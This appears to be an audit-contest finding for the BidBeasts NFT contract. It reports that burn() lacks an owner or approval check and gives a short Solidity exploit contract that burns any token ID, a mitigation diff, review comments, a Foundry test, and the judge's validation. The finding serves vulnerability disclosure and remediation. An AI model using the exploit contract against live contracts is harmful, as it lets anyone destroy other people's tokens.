Bid Beasts

First Flight #49
Beginner Friendly, Foundry, Solidity, NFT
100 EXP
Submission Details
Severity: high
Valid

Unauthorized Token Burning Vulnerability

Root + Impact

Description

  • A burn function in an NFT contract should allow only the token owner, or an address the owner has approved, to destroy a token.

  • The specific issue in the BidBeasts contract is that the burn function has no access control, allowing any address to burn any token regardless of ownership.

function burn(uint256 _tokenId) public {
    _burn(_tokenId);
    emit BidBeastsBurn(msg.sender, _tokenId);
}

Risk

Likelihood: High

  • Any user who knows a token ID can call this function to burn that token.

  • Nothing beyond a basic contract call is required: no special permissions, preconditions, or technical knowledge.

Impact: Critical

  • Permanent and irreversible loss of NFT assets for token holders.

  • Complete undermining of ownership rights in the NFT ecosystem.

  • Potential market manipulation by maliciously burning valuable or listed NFTs.

  • Loss of trust in the platform as users realize their assets can be destroyed by anyone.

Proof of Concept

// Attack scenario:
// Alice owns tokenId 5. Bob, who owns no tokens, deploys this contract and
// calls burnAnyToken(5):
// 1. Exploit calls BidBeasts.burn(5)
// 2. burn() performs no ownership or approval check and executes
// 3. Alice's token is permanently burned
// 4. Alice has no recourse, since a burn cannot be reversed
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Minimal interface for the vulnerable entry point shown above.
interface IBidBeasts {
    function burn(uint256 _tokenId) external;
}

contract Exploit {
    IBidBeasts public immutable target;

    constructor(address _target) {
        target = IBidBeasts(_target);
    }

    // Anyone can burn any token: no ownership check on the callee side.
    function burnAnyToken(uint256 tokenId) external {
        target.burn(tokenId);
    }
}

The vulnerability allows any address to burn any token without permission. This is particularly dangerous because:

  1. No Authorization Required: The function lacks any check to verify if the caller is the token owner or an approved address.

  2. Simple Attack Vector: A malicious actor only needs to know the token ID to destroy it permanently.

  3. Irreversible Damage: Once burned, the token's ownership and approval records are cleared from contract state and the token ID no longer exists; there is no recovery path short of the contract minting a replacement.

  4. Market Implications: This could be exploited to manipulate markets - for example, burning rare tokens to increase the value of similar tokens, or burning tokens listed on the marketplace to disrupt auctions.

Recommended Mitigation

- function burn(uint256 _tokenId) public {
- _burn(_tokenId);
- emit BidBeastsBurn(msg.sender, _tokenId);
- }
+ function burn(uint256 _tokenId) public {
+ require(ownerOf(_tokenId) == msg.sender || isApprovedForAll(ownerOf(_tokenId), msg.sender) || getApproved(_tokenId) == msg.sender, "Not token owner or approved");
+ _burn(_tokenId);
+ emit BidBeastsBurn(msg.sender, _tokenId);
+ }
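Review bot: the require on the added line calls ownerOf(_tokenId) twice; cache it once (`address owner = ownerOf(_tokenId);`) and test against the local, which also makes it obvious that the call reverts for a nonexistent token before any burn happens. If the contract inherits OpenZeppelin's ERC721, prefer the library's own authorization helper (`_isApprovedOrOwner(msg.sender, _tokenId)` in 4.x, `_checkAuthorized(owner, msg.sender, _tokenId)` in 5.x) so burn stays in sync with transfer authorization instead of re-implementing it. Note also that the event still records msg.sender, so an operator-initiated burn is logged under the operator rather than the owner; emit the cached owner if the log is meant to identify whose token was destroyed.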

The mitigation adds proper access control to the burn function by:

  1. Ownership Verification:

    • Checks if the caller is the actual token owner (ownerOf(_tokenId) == msg.sender)

    • Checks if the caller is an approved operator for the owner (isApprovedForAll(ownerOf(_tokenId), msg.sender))

    • Checks if the caller is specifically approved for this token (getApproved(_tokenId) == msg.sender)

  2. Security Benefits:

    • Uses the ERC-721 approval model (ownerOf, getApproved, isApprovedForAll), the same check OpenZeppelin's ERC721Burnable applies before burning

    • Prevents unauthorized destruction of NFT assets

    • Preserves ownership rights and the integrity of the NFT ecosystem

    • Maintains compatibility with the marketplace contract

This fix ensures that only legitimate token owners or their approved delegates can burn tokens, protecting users' digital assets from malicious actors.
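The Foundry test below, added here as an example and not part of the submission or the BidBeasts codebase, puts a stand-in for the reported burn next to the mitigated version and checks both behaviours: a stranger destroys another user's token in the vulnerable contract, is rejected by the fixed one, and the owner and a per-token approvee can still burn in the fixed one. The contract names VulnerableBeasts and FixedBeasts, the public mint used only for test setup, and the BidBeastsBurn event's parameter types are assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";
import {ERC721} from "@openzeppelin/contracts/token/ERC721/ERC721.sol";

// Stand-in reproducing the reported pattern. Assumption: the real BidBeasts
// contract mints through its own restricted path; this public mint exists
// only so the test can set up state.
contract VulnerableBeasts is ERC721 {
    event BidBeastsBurn(address burner, uint256 tokenId); // assumed signature

    constructor() ERC721("BidBeasts", "BB") {}

    function mint(address to, uint256 tokenId) external { _mint(to, tokenId); }

    // No authorization: any caller can burn any token (the reported bug).
    function burn(uint256 _tokenId) public {
        _burn(_tokenId);
        emit BidBeastsBurn(msg.sender, _tokenId);
    }
}

contract FixedBeasts is ERC721 {
    event BidBeastsBurn(address burner, uint256 tokenId); // assumed signature

    constructor() ERC721("BidBeasts", "BB") {}

    function mint(address to, uint256 tokenId) external { _mint(to, tokenId); }

    // Owner, per-token approvee, or operator only. ownerOf reverts for a
    // nonexistent token, so burning an unminted id fails as well.
    function burn(uint256 _tokenId) public {
        address owner = ownerOf(_tokenId);
        require(
            msg.sender == owner ||
                getApproved(_tokenId) == msg.sender ||
                isApprovedForAll(owner, msg.sender),
            "Not token owner or approved"
        );
        _burn(_tokenId);
        emit BidBeastsBurn(msg.sender, _tokenId);
    }
}

contract BurnAuthTest is Test {
    address alice = makeAddr("alice");
    address bob = makeAddr("bob");
    uint256 constant TOKEN = 5;

    VulnerableBeasts vulnerable;
    FixedBeasts fixedNft;

    function setUp() public {
        vulnerable = new VulnerableBeasts();
        fixedNft = new FixedBeasts();
        vulnerable.mint(alice, TOKEN);
        fixedNft.mint(alice, TOKEN);
    }

    // Bob owns nothing, yet destroys Alice's token.
    function test_strangerCanBurnVulnerable() public {
        assertEq(vulnerable.ownerOf(TOKEN), alice);
        vm.prank(bob);
        vulnerable.burn(TOKEN);
        vm.expectRevert(); // ownerOf reverts once the token no longer exists
        vulnerable.ownerOf(TOKEN);
    }

    function test_strangerCannotBurnFixed() public {
        vm.expectRevert(bytes("Not token owner or approved"));
        vm.prank(bob);
        fixedNft.burn(TOKEN);
        assertEq(fixedNft.ownerOf(TOKEN), alice);
    }

    function test_ownerAndApproveeCanBurnFixed() public {
        // Per-token approval lets Bob burn on Alice's behalf.
        vm.prank(alice);
        fixedNft.approve(bob, TOKEN);
        vm.prank(bob);
        fixedNft.burn(TOKEN);
        vm.expectRevert();
        fixedNft.ownerOf(TOKEN);

        // The owner can still burn her own token.
        fixedNft.mint(alice, 6);
        vm.prank(alice);
        fixedNft.burn(6);
        vm.expectRevert();
        fixedNft.ownerOf(6);
    }
}
```

Run with `forge test --match-contract BurnAuthTest -vv` in a project that has forge-std and OpenZeppelin Contracts installed; the first test passing is the finding itself, the other two show the mitigation rejects strangers without breaking owner or approvee burns.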

Updates

Lead Judging Commences

cryptoghost Lead Judge 21 days ago
Submission Judgement Published
Validated
Assigned finding tags:

BidBeasts ERC721: Anyone Can Burn

In the BidBeasts ERC721 implementation, the burn function is publicly accessible, allowing any external user to burn NFTs they do not own. This exposes all tokens to unauthorized destruction and results in permanent asset loss.

